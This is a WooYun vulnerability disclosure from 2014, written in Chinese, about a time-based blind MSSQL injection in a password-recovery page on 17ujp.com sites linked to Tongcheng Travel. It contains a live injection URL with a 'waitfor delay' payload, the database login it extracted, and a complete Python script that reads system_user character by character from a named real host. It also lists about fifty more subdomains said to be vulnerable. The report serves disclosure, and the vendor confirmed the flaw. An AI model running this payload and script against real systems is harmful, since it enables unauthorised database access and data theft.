缺陷编号:WooYun-2014-088834
漏洞标题:同程旅游网多个站点同类MSSQL注射(附验证脚本)
相关厂商:苏州同程旅游网络科技有限公司
漏洞作者:lijiejie
提交时间:2014-12-26 20:28
公开时间:2015-02-09 20:30
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
2014-12-26: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认,细节仅向厂商公开
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-09: 细节向公众公开
同程旅游网多站点同类MSSQL注射(附验证脚本)
注入点:
1 |
http://17349886.17ujp.com/Admin/AjaxForFindPwd.aspx?IsReseller=0&_=1419585952016&Account=123'; if (len(system_user)=10) waitfor delay '0:0:10'-- |
以上是猜解system_user长度为10
逐字符猜解system_user,得到:
1 |
17ujpadmin |
验证脚本:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
#encoding=gbk<br> import httplib<br> import time<br> import string<br> import sys<br> import random<br> import urllibheaders = {<br> 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',<br> }payloads = list(string.ascii_lowercase)<br> for i in range(0,10):<br> payloads.append(str(i))<br> payloads += ['@','_', '.', '-', '\\', ' ']print 'Try to retrive user:'<br> user = ''<br> for i in range(1,11):<br> for payload in payloads:<br> try:<br> conn = httplib.HTTPConnection('17349886.17ujp.com', timeout=3)<br> s = "if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:3' --" % (i, ord(payload))<br> params = "IsReseller=0&_=1419585952016&Account=123';" + urllib.quote(s)<br> conn.request(method='GET', url= '/Admin/AjaxForFindPwd.aspx?' + params,<br> headers = headers)<br> html_doc = conn.getresponse().read()<br> conn.close()<br> print '.',<br> except Exception, e:<br> user += payload<br> print '\nIn progress]', user<br> breakprint '\n[Done] User is:', user |
应该是域名泛解析,发现多个站点都存在该注射:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 |
http://18377290.17ujp.com<br> http://35369309.ctt.17ujp.com<br> http://19871649.17ujp.com<br> http://35369309.ct.17ujp.com<br> http://1534423.17ujp.com<br> http://33365104.ct.17ujp.com<br> http://14479454.17ujp.com<br> http://1134230.17ujp.com<br> http://1184097.17ujp.com<br> http://1393336.17ujp.com<br> http://1334783.17ujp.com<br> http://36403811.17ujp.com<br> http://1190222.17ujp.com<br> http://95241.17ujp.com<br> http://35369309.17ujp.com<br> http://33365104.17ujp.com<br> http://1702437.ctt.17ujp.com<br> http://1578794.17ujp.com<br> http://8446.17ujp.com<br> http://16687718.17ujp.com<br> http://1381187.17ujp.com<br> http://1191850.17ujp.com<br> http://1196320.17ujp.com<br> http://9938.17ujp.com<br> http://66405.17ujp.com<br> http://1191850.ct.17ujp.com<br> http://17349886.17ujp.com<br> http://1191850.ctt.17ujp.com<br> http://2340837.17ujp.com<br> http://1191850.cnc.17ujp.com<br> http://4045321.17ujp.com<br> http://9938.ctt.17ujp.com<br> http://39100370.17ujp.com<br> http://9938.cnc.17ujp.com<br> http://1186224.17ujp.com<br> http://9938.ct.17ujp.com<br> http://1373099.17ujp.com<br> http://980655.17ujp.com<br> http://1792227.ct.17ujp.com<br> http://1702437.17ujp.com<br> http://1792227.ctt.17ujp.com<br> http://1186435.17ujp.com<br> http://1792227.cnc.17ujp.com<br> http://1702437.ct.17ujp.com<br> http://26751655.ctt.17ujp.com<br> http://1702437.cnc.17ujp.com<br> http://26751655.ct.17ujp.com<br> http://1157668.17ujp.com<br> http://26751655.cnc.17ujp.com<br> http://1539098.17ujp.com<br> http://10873993.ctt.17ujp.com |
过滤
危害等级:高
漏洞Rank:15
确认时间:2014-12-2620:55
感谢关注同程旅游,已在安排修复,谢谢李姐姐。
暂无
前排!
前排!
放开他,冲我来!
李姐姐你又来了
李姐姐就是厉害
@途牛旅游网 你们是基友吗?
原文连接
的情况下转载,若非则不得使用我方内容。